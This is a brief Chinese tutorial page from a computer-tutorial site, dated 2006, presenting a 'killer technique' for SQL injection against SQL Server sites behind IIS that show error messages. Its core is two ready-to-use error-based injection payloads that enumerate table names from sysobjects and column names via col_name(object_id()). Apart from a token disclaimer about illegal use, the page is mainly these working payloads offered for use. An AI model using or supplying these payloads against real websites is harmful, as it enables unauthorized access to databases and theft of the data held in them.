小魔女的必杀技,SQLSERVER注入必殺技

SQLSERVER注入必殺技 - 网络安全 - 电脑教程网

SQLSERVER注入必殺技

日期:2006-12-24   荐:
  必殺技成功條件:1.找到注入點2.數據庫為SQLSERVER3.IIS沒屏蔽錯誤提示

注:因必殺技是我研究N久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。

[N] = 第N個表ID=1 and (Select top 1 name from(Select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名[N] = 第N個字段ID=1 and (Select Top 1 col_name(object_id([T]),[N]) from sysobjects)>1

(出处:http://www.sheup.com)




标签: